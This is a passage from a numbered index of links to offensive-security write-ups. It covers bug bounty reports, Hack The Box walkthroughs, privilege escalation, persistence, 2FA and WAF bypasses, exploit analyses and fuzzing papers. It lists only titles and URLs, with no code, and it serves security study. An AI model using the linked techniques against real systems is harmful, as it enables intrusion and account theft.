https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/still-scanning-ip-addresses-you-re-doing-it-wrong/ -2062-Source Code Disclosure via Exposed .git Folder: https://medium.com/dev-genius/source-code-disclosure-via-exposed-git-folder-24993c7561f1 -2063-GitHub Recon - It’s Really Deep: https://medium.com/@shahjerry33/github-recon-its-really-deep-6553d6dfbb1f -2064-From SSRF to Compromise: Case Study: https://trustwave.com/en-us/resources/blogs/spiderlabs-blog/from-ssrf-to-compromise-case-study/ -2065-Bug Hunting with Param Miner: Cache poisoning with XSS, a peculiar case: https://medium.com/bugbountywriteup/cache-poisoning-with-xss-a-peculiar-case-eb5973850814 -2066-Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability: https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/ -2067-Avoiding detection via dhcp options: https://sensepost.com/blog/2020/avoiding-detection-via-dhcp-options/ -2068-Bug Bytes #86 - Stealing local files with Safari, Prototype pollution vs HTML sanitizers & A hacker’s mom learning bug bounty: https://blog.intigriti.com/2020/09/02/bug-bytes-86-stealing-local-files-with-safari-prototype-pollution-vs-html-sanitizers-a-hackers-mom-learning-bug-bounty/ -2069-Bug Bytes #78 - BIG-IP RCE, Azure account takeover & Hunt scanner is back: https://blog.intigriti.com/2020/07/08/bug-bytes-78-big-ip-rce-azure-account-takeover-hunt-scanner-is-back/ -2070-Hacking a Telecommunication company(MTN): https://medium.com/@afolicdaralee/hacking-a-telecommunication-company-mtn-c46696451fed -2071-$20000 Facebook DOM XSS: https://vinothkumar.me/20000-facebook-dom-xss/ -2072-Backdooring WordPress with Phpsploit: https://blog.wpsec.com/backdooring-wordpress-with-phpsploit/ -2073-Pro tips for bugbounty: https://medium.com/@chawdamrunal/pro-tips-for-bug-bounty-f9982a5fc5e9 -2074-Collection Of #bugbountytips: https://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248 -2075-Offensive Netcat/Ncat: From Port Scanning To Bind Shell IP Whitelisting: https://medium.com/@PenTest_duck/offensive-netcat-ncat-from-port-scanning-to-bind-shell-ip-whitelisting-834689b103da -2076-XSS for beginners: https://medium.com/swlh/xss-for-beginners-6752b1b1487d -2077-LET’S GO DEEP INTO OSINT: PART 1: medium.com/bugbountywriteup/lets-go-deep-into-osint-part-1-c2de4fe4f3bf -2087-Beginner’s Guide to recon automation: medium.com/bugbountywriteup/beginners-guide-to-recon-automation-f95b317c6dbb -2079-Automating Recon: https://medium.com/@amyrahm786/automating-recon-28b36dc2cf48 -2080-XSS WAF & Character limitation bypass like a boss: https://medium.com/bugbountywriteup/xss-waf-character-limitation-bypass-like-a-boss-2c788647c229 -2081-Chaining Improper Authorization To Race Condition To Harvest Credit Card Details : A Bug Bounty Story: https://medium.com/@ciph3r7r0ll/chaining-improper-authorization-to-race-condition-to-harvest-credit-card-details-a-bug-bounty-effe6e0f5076 -2082-TryHackMe Linux Challenges: https://secjuice.com/write-up-10-tryhackme-linux-challenges-part-1/ -2083-Persistence – COM Hijacking: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/ -2084-DLL Proxy Loading Your Favourite C# Implant https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/ -2085-how offensive actors use applescript for attacking macos: https://sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos -2086-Windows Privilege Escalation without Metasploit https://medium.com/@sushantkamble/windows-privilege-escalation-without-metasploit-9bad5fbb5666 -2087-Privilege Escalation in Windows: https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842 -2088-OSWE Prep — Hack The Box Magic: https://medium.com/@ranakhalil101/oswe-prep-hack-the-box-magic-f173e2d09125 -2089-Hackthebox | Bastion Writeup: https://medium.com/@_ncpd/hackthebox-bastion-writeup-9d6f6da3bcbb -2090-Hacking Android phone remotely using Metasploit: https://medium.com/@irfaanshakeel/hacking-android-phone-remotely-using-metasploit-43ccf0fbe9b8 -2091-“Hacking with Metasploit” Tutorial: https://medium.com/cybersoton/hacking-with-metasploit-tutorial-7635b9d19e5 -2092-Hack The Box — Tally Writeup w/o Metasploit: https://medium.com/@ranakhalil101/hack-the-box-tally-writeup-w-o-metasploit-b8bce0684ad3 -2093-Burp Suite: https://medium.com/cyberdefendersprogram/burp-suite-webpage-enumeration-and-vulnerability-testing-cfd0b140570d -2094-h1–702 CTF — Web Challenge Write Up: https://medium.com/@amalmurali47/h1-702-ctf-web-challenge-write-up-53de31b2ddce -2095-SQL Injection & Remote Code Execution: https://medium.com/@shahjerry33/sql-injection-remote-code-execution-double-p1-6038ca88a2ec -2096-Juicy Infos hidden in js scripts leads to RCE : https://medium.com/@simobalghaoui/juicy-infos-hidden-in-js-scripts-lead-to-rce-5d4abbf24d9c -2097-Escalating Privileges like a Pro: https://gauravnarwani.com/escalating-privileges-like-a-pro/ -2098-Top 16 Active Directory Vulnerabilities: https://www.infosecmatter.com/top-16-active-directory-vulnerabilities/ -2099-Windows Red Team Cheat Sheet: https://morph3sec.com/Cheat-Sheets/Windows-Red-Team-Cheat-Sheet/ -2100-OSCP: Developing a Methodology: https://medium.com/@falconspy/oscp-developing-a-methodology-32f4ab471fd6 -2101-Zero to OSCP: Concise Edition: https://medium.com/@1chidan/zero-to-oscp-concise-edition-b5ecd4a781c3 -2102-59 Hosts to Glory — Passing the OSCP: https://medium.com/@Tib3rius/59-hosts-to-glory-passing-the-oscp-acf0fd384371 -2103-Can We Automate Bug Bounties With Wfuzz? medium.com/better-programming/can-we-automate-earning-bug-bounties-with-wfuzz-c4e7a96810a5 -2104-Advanced boolean-based SQLi filter bypass techniques: https://www.secjuice.com/advanced-sqli-waf-bypass/ -2105-Beginners Guide On How You Can Use Javascript In BugBounty: https://medium.com/@patelkathan22/beginners-guide-on-how-you-can-use-javascript-in-bugbounty-492f6eb1f9ea -2106-OTP Bypass: medium.com/bugbountywriteup/otp-bypass-on-indias-biggest-video-sharing-site-e94587c1aa89 -2107-How we Hijacked 26+ Subdomains: https://medium.com/@aishwaryakendle/how-we-hijacked-26-subdomains-9c05c94c7049 -2018-How to spot and exploit postMessage vulnerablities: https://medium.com/bugbountywriteup/how-to-spot-and-exploit-postmessage-vulnerablities-329079d307cc -2119-IDA Pro Tips to Add to Your Bag of Tricks: https://swarm.ptsecurity.com/ida-pro-tips/ -2120-N1QL Injection: Kind of SQL Injection in a NoSQL Database: https://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database/ -2121-CSRF Protection Bypass in Play Framework: https://blog.doyensec.com/2020/08/20/playframework-csrf-bypass.html -2122-$25K Instagram Almost XSS Filter Link — Facebook Bug Bounty: https://medium.com/@alonnsoandres/25k-instagram-almost-xss-filter-link-facebook-bug-bounty-798b10c13b83 -2123-techniques for learning passwords: https://rootkitpen.blogspot.com/2020/09/techniques-for-learning-passwords.html -2124-How a simple CSRF attack turned into a P1: https://ladysecspeare.wordpress.com/2020/04/05/how-a-simple-csrf-attack-turned-into-a-p1-level-bug/ -2125-How I exploited the json csrf with method override technique: https://medium.com/@secureITmania/how-i-exploit-the-json-csrf-with-method-override-technique-71c0a9a7f3b0 -2126-How I found CSRF(my first bounty): https://medium.com/@rajeshranjan457/how-i-csrfd-my-first-bounty-a62b593d3f4d -2127-Exploiting websocket application wide XSS and CSRF: https://medium.com/@osamaavvan/exploiting-websocket-application-wide-xss-csrf-66e9e2ac8dfa -2128-Touch ID authentication Bypass on evernote and dropbox iOS apps: https://medium.com/@pig.wig45/touch-id-authentication-bypass-on-evernote-and-dropbox-ios-apps-7985219767b2 -2129-Oauth authentication bypass on airbnb acquistion using wierd 1 char open redirect: https://xpoc.pro/oauth-authentication-bypass-on-airbnb-acquisition-using-weird-1-char-open-redirect/ -2130-Two factor authentication bypass: https://gauravnarwani.com/two-factor-authentication-bypass/ -2132-Tricky oracle SQLI situation: https://blog.yappare.com/2020/04/tricky-oracle-sql-injection-situation.html -2133-CORS bug on google’s 404 page (rewarded): https://medium.com/@jayateerthag/cors-bug-on-googles-404-page-rewarded-2163d58d3c8b -2134-Subdomain takeover via unsecured s3 bucket: https://blog.securitybreached.org/2018/09/24/subdomain-takeover-via-unsecured-s3-bucket/ -2135-Subdomain takeover via wufoo service: https://www.mohamedharon.com/2019/02/subdomain-takeover-via-wufoo-service-in.html -2136-How I found CSRF(my first bounty): https://medium.com/@rajeshranjan457/how-i-csrfd-my-first-bounty-a62b593d3f4d -2137-Race condition that could result to RCE a story with an app: https://medium.com/bugbountywriteup/race-condition-that-could-result-to-rce-a-story-with-an-app-that-temporary-stored-an-uploaded-9a4065368ba3 -2138-Creating thinking is our everything : Race condition and business logic: https://medium.com/@04sabsas/bugbounty-writeup-creative-thinking-is-our-everything-race-condition-business-logic-error-2f3e82b9aa17 -2139-Chaining improper authorization to Race condition to harvest credit card details: https://medium.com/@ciph3r7r0ll/chaining-improper-authorization-to-race-condition-to-harvest-credit-card-details-a-bug-bounty-effe6e0f5076 -2140-Google APIs Clickjacking worth 1337$: https://medium.com/@godofdarkness.msf/google-apis-clickjacking-1337-7a3a9f3eb8df -2141-Bypass CSRF with clickjacking on Google org: https://medium.com/@saadahmedx/bypass-csrf-with-clickjacking-worth-1250-6c70cc263f40 -2142-2FA Bypass via logical rate limiting Bypass: https://medium.com/@jeppe.b.weikop/2fa-bypass-via-logical-rate-limiting-bypass-25ae2a4e1835 -2143-OTP bruteforce account takeover: https://medium.com/@ranjitsinghnit/otp-bruteforce-account-takeover-faaac3d712a8 -2144-Microsoft RCE bugbounty: https://blog.securitybreached.org/2020/03/31/microsoft-rce-bugbounty/ -2145-Bug Bounty Tips #1: https://www.infosecmatter.com/bug-bounty-tips-1/ -2146-Bug Bounty Tips #2: https://www.infosecmatter.com/bug-bounty-tips-2-jun-30/ -2147-Bug Bounty Tips #3: https://www.infosecmatter.com/bug-bounty-tips-3-jul-21/ -2148-Bug Bounty Tips #4: https://www.infosecmatter.com/bug-bounty-tips-4-aug-03/ -2149-Bug Bounty Tips #5: https://www.infosecmatter.com/bug-bounty-tips-5-aug-17/ -2150-Bug Bounty Tips #6: https://www.infosecmatter.com/bug-bounty-tips-6-sep-07/ -2151-Finding Bugs in File Systems with an Extensible Fuzzing Framework ﴾TOS 2020﴿: https://wcventure.github.io/FuzzingPaper/Paper/TOS20_FileSys.pdf -2152-PeriScope: An Effective Probing and Fuzzing Framework for the Hardware‐OS Boundary ﴾NDSS2019﴿: https://wcventure.github.io/FuzzingPaper/Paper/NDSS19_PeriScope.pdf -2153-Bug Bounty Tips #7: https://www.infosecmatter.com/bug-bounty-tips-7-sep-27/ -2154-Fuzzing: Hack, Art, and Science ﴾CACM 2020﴿: https://wcventure.github.io/FuzzingPaper/Paper/CACM20_Fuzzing.pdf -2155-Azure File Shares for Pentesters: https://blog.netspi.com/azure-file-shares-for-pentesters/ -2156-XSS like a Pro: https://www.hackerinside.me/2019/12/xss-like-pro.html -2157-XSS on Cookie Pop-up Warning: https://vict0ni.me/bug-hunting-xss-on-cookie-popup-warning/ -2158-Effortlessly finding Cross Site Script Inclusion (XSSI) & JSONP for bug bounty: https://medium.com/bugbountywriteup/effortlessly-finding-cross-site-script-inclusion-xssi-jsonp-for-bug-bounty-38ae0b9e5c8a -2159-XSS in Zoho Mail: https://www.hackerinside.me/2019/09/xss-in-zoho-mail.html -2160-Overview Of Empire 3.4 Features: https://www.bc-security.org/post/overview-of-empire-3-4-features/ -2161-Android App Source code Extraction and Bypassing Root and SSL Pinning checks: https://vj0shii.info/android-app-testing-initial-steps/ -2162-The 3 Day Account Takeover: https://medium.com/@__mr_beast__/the-3-day-account-takeover-269b0075d526 -2163-A Review of Fuzzing Tools and Methods: https://wcventure.github.io/FuzzingPaper/Paper/2017_review.pdf -2164-PeriScope: An Effective Probing and Fuzzing Framework for the Hardware‐OS Boundary ﴾NDSS2019﴿: https://wcventure.github.io/FuzzingPaper/Paper/NDSS19_PeriScope.pdf -2165-Oneplus XSS vulnerability in customer support portal: https://medium.com/@tech96bot/oneplus-xss-vulnerability-in-customer-support-portal-d5887a7367f4 -2166-Windows-Privilege-Escalation-Resources: https://medium.com/@aswingovind/windows-privilege-escalation-resources-d35dca8444de -2167-Persistence – DLL Hijacking: https://pentestlab.blog/page/5/ -2168-Scanning JS Files for Endpoints and Secrets: https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/ -2169-Password Spraying Secure Logon for F5 Networks: https://www.n00py.io/2020/08/password-spraying-secure-logon-for-f5-networks/ -2170-Password Spraying Dell SonicWALL Virtual Office: https://www.n00py.io/2019/12/password-spraying-dell-sonicwall-virtual-office/ -2171-Attention to Details : Finding Hidden IDORs: https://medium.com/@aseem.shrey/attention-to-details-a-curious-case-of-multiple-idors-5a4417ba8848 -2172-Bypassing file upload filter by source code review in Bolt CMS: https://stazot.com/boltcms-file-upload-bypass/ -2173-HTB{ Giddy }: https://epi052.gitlab.io/notes-to-self/blog/2019-02-09-hack-the-box-giddy/ -2174-Analyzing WhatsApp Calls with Wireshark, radare2 and Frida: https://movaxbx.ru/2020/02/11/analyzing-whatsapp-calls-with-wireshark-radare2-and-frida/ -2175-2FA bypass via CSRF attack: https://medium.com/@vbharad/2-fa-bypass-via-csrf-attack-8f2f6a6e3871 -2176-CSRF token bypass [a tale of 2k bug]: https://medium.com/@sainttobs/csrf-token-bypasss-a-tale-of-my-2k-bug-ff7f51166ea1 -2177-Setting the ‘Referer’ Header Using JavaScript: https://www.trustedsec.com/blog/setting-the-referer-header-using-javascript/ -2178-Bug Bytes #91 - The shortest domain, Weird Facebook authentication bypass & GitHub Actions secrets: https://blog.intigriti.com/2020/10/07/bug-bytes-91-the-shortest-domain-weird-facebook-authentication-bypass-github-actions-secrets/ -2179-Stored XSS on Zendesk via Macro’s PART 2: https://medium.com/@hariharan21/stored-xss-on-zendesk-via-macros-part-2-676cefee4616 -2180-Azure Account Hijacking using mimikatz’s lsadump::setntlm: https://www.trustedsec.com/blog/azure-account-hijacking-using-mimikatzs-lsadumpsetntlm/ -2181-CORS misconfiguration account takeover out of scope to grab items in scope: https://medium.com/@mashoud1122/cors-misconfiguration-account-takeover-out-of-scope-to-grab-items-in-scope-66d9d18c7a46 -2182-Razzer: Finding Kernel Race Bugs through Fuzzing ﴾S&P 2019﴿: https://wcventure.github.io/FuzzingPaper/Paper/SP19_Razzer.pdf https://lifeasageek.github.io/papers/jeong-razzer-slides.pdf -2183-Facebook Bug bounty : How I was able to enumerate instagram accounts who had enabled 2FA: https://medium.com/@zk34911/facebook-bug-bounty-how-i-was-able-to-enumerate-instagram-accounts-who-had-enabled-2fa-two-step-fddba9e9741c -2184-Bypass hackerone 2FA: https://medium.com/japzdivino/bypass-hackerone-2fa-requirement-and-reporter-blacklist-46d7959f1ee5 -2185-How I abused 2FA to maintain persistence after password recovery change google microsoft instragram: https://medium.com/@lukeberner/how-i-abused-2fa-to-maintain-persistence-after-a-password-change-google-microsoft-instagram-7e3f455b71a1 -2186-How I hacked 40k user accounts of microsoft using 2FA bypass outlook: https://medium.com/@goyalvartul/how-i-hacked-40-000-user-accounts-of-microsoft-using-2fa-bypass-outlook-live-com-13258785ec2f -2187-How to bypass 2FA with a HTTP header: https://medium.com/@YumiSec/how-to-bypass-a-2fa-with-a-http-header-ce82f7927893 -2188-Building a custom Mimikatz binary: https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/ -2189-Self XSS to Good XSS: https://medium.com/@arbazhussain/self-xss-to-good-xss-clickjacking-6db43b44777e -2190-DOM based XSS or why you should not rely on cloudflare too much: https://medium.com/bugbountywriteup/dom-based-xss-or-why-you-should-not-rely-on-cloudflare-too-much-a1aa9f0ead7d -2191-Reading internal files using SSRF vulnerability: https://medium.com/@neerajedwards/reading-internal-files-using-ssrf-vulnerability-703c5706eefb -2192-Latest web hacking tools: https://portswigger.net/daily-swig/latest-web-hacking-tools-q3-2020 -2193-Cross-Site Scripting (XSS) Cheat Sheet - 2020 Edition: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet -2194-Hijacking a Domain Controller with Netlogon RPC (aka Zerologon: CVE-2020-1472): https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hijacking-a-domain-controller-with-netlogon-rpc-aka-zerologon-cve-2020-1472/ -2195-How I got 1200+ Open S3 buckets…!: https://medium.com/@mail4frnd.mohit/how-i-got-1200-open-s3-buckets-aec347ea2a1e -2196-Open Sesame: Escalating Open Redirect to RCE with Electron Code Review: https://spaceraccoon.dev/open-sesame-escalating-open-redirect-to-rce-with-electron-code-review -2197-When you browse Instagram and find former Australian Prime Minister Tony Abbott's passport number: https://mango.pdf.zone/finding-former-australian-prime-minister-tony-abbotts-passport-number-on-instagram -2198-HTB{ Vault }: https://epi052.gitlab.io/notes-to-self/blog/2018-11-04-hack-the-box-vault/ -2199-HTB{ ellingson }: https://epi052.gitlab.io/notes-to-self/blog/2019-09-29-hack-the-box-ellingson/ -2200-HTB{ Swagshop }: https://epi052.gitlab.io/notes-to-self/blog/2019-09-12-hack-the-box-swagshop/ -2201-Evading Firewalls with Tunnels: https://michiana-infosec.com/evading-firewalls-with-tunnels/ -2202-How to Geolocate Mobile Phones (or not): https://keyfindings.blog/2020/07/12/how-to-geolocate-mobile-phones-or-not/ -2203-Web application race conditions: It’s not just for binaries: https://blog.pucarasec.com/2020/07/06/web-application-race-conditions-its-not-just-for-binaries/ -2204-Two-Factor Authentication Bypass: https://gauravnarwani.com/two-factor-authentication-bypass/ -2205-Proxies, Pivots, and Tunnels – Oh My! : https://blog.secureideas.com/2020/10/proxies_pivots_tunnels.html -2206-Let's Debug Together: CVE-2020-9992: https://blog.zimperium.com/c0ntextomy-lets-debug-together-cve-2020-9992/ -2207-I Like to Move It: Windows Lateral Movement Part 3: DLL Hijacking: https://www.mdsec.co.uk/2020/10/i-live-to-move-it-windows-lateral-movement-part-3-dll-hijacking/ -2208-Abusing Chrome's XSS auditor to steal tokens: https://portswigger.net/research/abusing-chromes-xss-auditor-to-steal-tokens -2209-ModSecurity, Regular Expressions and Disputed CVE-2020-15598: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/modsecurity-regular-expressions-and-disputed-cve-2020-15598/ -2210-Bug Bounty Tips #8: https://www.infosecmatter.com/bug-bounty-tips-8-oct-14/ -2211-IOS Pentesing Guide From A N00bs Perspective: https://payatu.com/blog/abhilashnigam/ios-pentesing-guide-from-a-n00bs-perspective.1 -2212-Bug Bytes #92 - Pwning Apple for three months, XSS in VueJS, Hacking Salesforce Lightning & Unicode byͥtes: https://blog.intigriti.com/2020/10/14/bug-bytes-92-pwning-apple-for-three-months-xss-in-vuejs-hacking-salesforce-lightning-unicode-by%cd%a5tes/ -2213-We Hacked Apple for 3 Months: Here’s What We Found: https://samcurry.net/hacking-apple/ -2214-Breaking JCaptcha using Tensorflow and AOCR: https://www.gremwell.com/breaking-jcaptcha-tensorflow-aocr -2215-Bug Bytes #82 - Timeless timing attacks, Grafana SSRF, Pizza & Youtube delicacie: https://blog.intigriti.com/2020/08/05/bug-bytes-82-timeless-timing-attacks-grafana-ssrf-pizza-youtube-delicacies/ -2216-Bug Bytes #71 – 20K Facebook XSS, LevelUp 0x06 &Naffy’s Notes: https://blog.intigriti.com/2020/05/20/bug-bytes-71-20k-facebook-xss-levelup-0x06-naffys-notes/ -2217-Bug Bytes #90 - The impossible XSS, Burp Pro tips & A millionaire on bug bounty and meditation: https://blog.intigriti.com/2020/09/30/bug-bytes-90-the-impossible-xss-burp-pro-tips-a-millionaire-on-bug-bounty-and-meditation/ -2218-How to Find Vulnerabilities in Code: Bad Words: https://btlr.dev/blog/how-to-find-vulnerabilities-in-code-bad-words -2219-Testing for WebSockets security vulnerabilities: https://portswigger.net/web-security/websockets -2220-Practical Web Cache Poisoning: https://portswigger.net/research/practical-web-cache-poisoning -2221-htb{ zipper }: https://epi052.gitlab.io/notes-to-self/blog/2018-10-22-hack-the-box-zipper/ -2222-What is HTTP request smuggling? Tutorial & Examples: https://portswigger.net/web-security/request-smuggling -2223-When alert fails: exploiting transient events: https://portswigger.net/research/when-alert-fails-exploiting-transient-events -2224-BugPoC LFI Challeng: https://hipotermia.pw/bb/bugpoc-lfi-challenge -2225-Misc CTF - Request Smuggling: https://hg8.sh/posts/misc-ctf/request-smuggling/ -2226-403 to RCE in XAMPP: https://www.securifera.com/blog/2020/10/13/403-to-rce-in-xampp/ -2227-Phone numbers investigation, the open source way: https://www.secjuice.com/phone-numbers-investigation-the-open-source-way/ -2228-Covert Web Shells in .NET with Read-Only Web Paths: https://www.mdsec.co.uk/2020/10/covert-web-shells-in-net-with-read-only-web-paths/ -2229-From Static Analysis to RCE: https://blog.dixitaditya.com/from-android-app-to-rce/ -2230-GitHub Pages - Multiple RCEs via insecure Kramdown configuration - $25,000 Bounty: https://devcraft.io/2020/10/20/github-pages-multiple-rces-via-kramdown-config.html -2231-Signed Binary Proxy Execution via PyCharm: https://www.archcloudlabs.com/projects/signed_binary_proxy_execution/ -2232-Bug Bytes #93 - Discord RCE, Vulnerable HTML to PDF converters & DOMPurify bypass demystified : https://blog.intigriti.com/2020/10/21/bug-bytes-93-discord-rce-vulnerable-html-to-pdf-converters-dompurify-bypass-demystified/ -2233-Bug Bytes #94 - Breaking Symfony apps, Why Cyber Security is so hard to learn & how best to approach it: https://blog.intigriti.com/2020/10/28/bug-bytes-94-breaking-symfony-apps-why-cyber-security-is-so-hard-to-learn-how-best-to-approach-it/ -2234-Advanced Level Resources For Web Application Penetration Testing: https://twelvesec.com/2020/10/19/advanced-level-resources-for-web-application-penetration-testing/ -2235-Pass-the-hash wifi: https://sensepost.com/blog/2020/pass-the-hash-wifi/ -2236-HTML to PDF converters, can I hack them?: https://sidechannel.tempestsi.com/html-to-pdf-converters-can-i-hack-them-a681cfee0903 -2237-Android adb reverse tethering mitm setup: https://www.securify.nl/blog/android-adb-reverse-tethering-mitm-setup/ -2238-Typical Wi-Fi attacks: https://splone.com/blog/2020/10/13/typical-wi-fi-attacks/ -2239-Burp suite “ninja moves”: https://owasp.org/www-chapter-norway/assets/files/Burp%20suite%20ninja%20moves.pdf -2240-Razzer: Finding Kernel Race Bugs through Fuzzing ﴾S&P 2019﴿: Paper:https://wcventure.github.io/FuzzingPaper/Paper/SP19_Razzer.pdf Code:https://github.com/compsec-snu/razzer Slides:https://lifeasageek.github.io/papers/jeong-razzer-slides.pdf -2241-MoonShine: Optimizing OS Fuzzer Seed Selection with Trace Distillation ﴾USENIX Security2018﴿: Paper:https://wcventure.github.io/FuzzingPaper/Paper/USENIX18_MoonShine.pdf -2242-Sequence directed hybrid fuzzing ﴾SANER 2020﴿: Paper:https://wcventure.github.io/FuzzingPaper/Paper/SANER20_Sequence.pdf -2243-Open Source Intelligence Tools And Resources Handbook 2020: https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf -2244-How to Find IP Addresses Owned by a Company: https://securitytrails.com/blog/identify-ip-ranges-company-owns -2245-What is Banner Grabbing? Best Tools and Techniques Explained: https://securitytrails.com/blog/banner-grabbing -2246-Recon Methods Part 4 – Automated OSINT: https://www.redsiege.com/blog/2020/04/recon-methods-part-4-automated-osint/ -2247-Forcing Firefox to Execute XSS Payloads during 302 Redirects: https://www.gremwell.com/firefox-xss-302 -2248-HTB{ Frolic }: https://epi052.gitlab.io/notes-to-self/blog/2018-10-22-hack-the-box-frolic/ -2249-Identifying Vulnerabilities in SSL/TLS and Attacking them: https://medium.com/bugbountywriteup/identifying-vulnerabilities-in-ssl-tls-and-attacking-them-e7487877619a -2250-My First Bug Bounty Reward: https://medium.com/bugbountywriteup/my-first-bug-bounty-reward-8fd133788407 -2251-2FA Bypass On Instagram Through A Vulnerable Endpoint: https://medium.com/bugbountywriteup/2fa-bypass-on-instagram-through-a-vulnerable-endpoint-b092498af178 -2252-Automating XSS using Dalfox, GF and Waybackurls: https://medium.com/bugbountywriteup/automating-xss-using-dalfox-gf-and-waybackurls-bc6de16a5c75 -2253-Think Outside the Scope: Advanced CORS Exploitation Techniques: https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397 -2254-Intro to CTFs. Resources, advice and everything else: https://medium.com/bugbountywriteup/intro-to-ctfs-164a03fb9e60 -2255-PowerShell Commands for Pentesters: https://www.infosecmatter.com/powershell-commands-for-pentesters/ -2256-31k$ SSRF in Google Cloud Monitoring led to metadata exposure: https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html -2257-NAT Slipstreaming: https://samy.pl/slipstream/ -2258-How i got 7000$ in Bug-Bounty for my Critical Finding: https://medium.com/@noobieboy1337/how-i-got-7000-in-bug-bounty-for-my-critical-finding-99326d2cc1ce -2259-SQL Injection Payload List: https://medium.com/@ismailtasdelen/sql-injection-payload-list-b97656cfd66b -2260-Taking over multiple user accounts: https://medium.com/bugbountywriteup/chaining-password-reset-link-poisoning-idor-account-information-leakage-to-achieve-account-bb5e0e400745 -2261-Bug Bytes #98 - Imagemagick's comeback, Treasure trove of wordlists, Advent of Cyber & How to get more hours in your day: https://blog.intigriti.com/2020/11/25/bug-bytes-98-imagemagicks-comeback-treasure-trove-of-wordlists-advent-of-cyber-how-to-get-more-hours-in-your-day/ -2262-How to get root on Ubuntu 20.04 by pretending nobody’s /home: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE -2263-What is Shodan? Diving into the Google of IoT Devices: https://securitytrails.com/blog/what-is-shodan -2264-Purgalicious VBA: Macro Obfuscation With VBA Purging & OfficePurge: https://www.fireeye.com/blog/threat-research/2020/11/purgalicious-vba-macro-obfuscation-with-vba-purging.html https://github.com/fireeye/OfficePurge -2265-Dynamic Invocation in .NET to bypass hooks: https://blog.nviso.eu/2020/11/20/dynamic-invocation-in-net-to-bypass-hooks/ -2266-NepHack Online CTF June 2020 Write-up: https://www.askbuddie.com/blog/nephack-online-ctf-june-2020-write-up/ -2268-Attacking SCADA Part II:: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacking-scada-part-ii-vulnerabilities-in-schneider-electric-ecostruxure-machine-expert-and-m221-plc/ -2269-PENTESTING CHEATSHEET: https://hausec.com/pentesting-cheatsheet -2270-CVE-2020-16898 – Exploiting “Bad Neighbor” vulnerability: http://blog.pi3.com.pl/?p=780 -2271-TShark Cheatsheet: https://snippets.bentasker.co.uk/page-1909131238-TShark-Cheatsheet-BASH.html -2272-Exploiting a “Simple” Vulnerability – In 35 Easy Steps or Less!: https://windows-internals.com/exploiting-a-simple-vulnerability-in-35-easy-steps-or-less/ -2273-Exploiting CVE-2020-0041 - Part 1: Escaping the Chrome Sandbox: https://labs.bluefrostsecurity.de/blog/2020/03/31/cve-2020-0041-part-1-sandbox-escape/ -2274-Exploiting CVE-2020-0041 - Part 2: Escalating to root: https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/ -2275-Exploiting MS16-145: MS Edge TypedArray.sort Use-After-Free (CVE-2016-7288): https://blog.quarkslab.com/exploiting-ms16-145-ms-edge-typedarraysort-use-after-free-cve-2016-7288.html -2276-Bug Bytes #99 – Bypassing bots and WAFs,JQ in Burp & Smarter JSON fuzzing and subdomain takeovers: https://blog.intigriti.com/2020/12/02/bug-bytes-99-bypassing-bots-and-wafs-jq-in-burp-smarter-json-fuzzing-and-subdomain-takeovers/ -2277-Digging secrets from git repositories by using truffleHog: https://redblueteam.wordpress.com/2020/01/04/digging-secrets-from-git-repositories-by-using-trufflehog -2287-Apple Safari Pwn2Own 2018 Whitepaper: https://labs.f-secure.com/assets/BlogFiles/apple-safari-pwn2own-vuln-write-up-2018-10-29-final.pdf -2288-DISSECTING APT21 SAMPLES USING A STEP-BY-STEP APPROACH: https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/ -2289-MITRE ATT&CK T1082 System Information Discovery: https://www.picussecurity.com/resource/attck-t1082-system-information-discovery -2290-A simple and fast Wireshark tutorial: https://andregodinho1.medium.com/a-simple-and-fast-wireshark-tutorial-7d2b78a71820 -2291-Recon - My Way Or High Way: https://shahjerry33.medium.com/recon-my-way-or-high-way-58a18dab5c95 -2292-Finding bugs at limited scope programs (Single Domain Websites): https://dewcode.medium.com/finding-bugs-at-limited-scopes-programs-single-domain-websites-d3c2ff396edf -2293-Passive intelligence gathering techniques: https://medium.com/@agent_maximus/passive-intelligence-gathering-techniques-uncover-domains-subdomains-ip-addresses-a40f51ee0eb0 -2294-Android Pen-testing/Hunting 101: https://medium.com/@noobieboy1337/android-pen-testing-hunting-101-dc0fecf90682 -2295-All MITM attacks in one place: https://github.com/Sab0tag3d/MITM-cheatsheet -2296-From Recon to Optimizing RCE Results: https://medium.com/bugbountywriteup/from-recon-to-optimizing-rce-results-simple-story-with-one-of-the-biggest-ict-company-in-the-ea710bca487a -2297-RCE on https://beta-partners.tesla.com due to CVE-2020-0618: https://bugcrowd.com/disclosures/d23e05b1-c4cc-440a-a678-d8045468c902/rce-on-https-beta-partners-tesla-com-due-to-cve-2020-0618 -2298-Remote iPhone Exploitation Part 1: Poking Memory via iMessage and CVE-2019-8641: https://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-1.html -2299-Remote iPhone Exploitation Part 2: Bringing Light into the Darkness -- a Remote ASLR Bypass: https://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-2.html -2300-Remote iPhone Exploitation Part 3: From Memory Corruption to JavaScript and Back -- Gaining Code Execution: https://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-3.html -2301-1000$ for Open redirect via unknown technique [BugBounty writeup]: 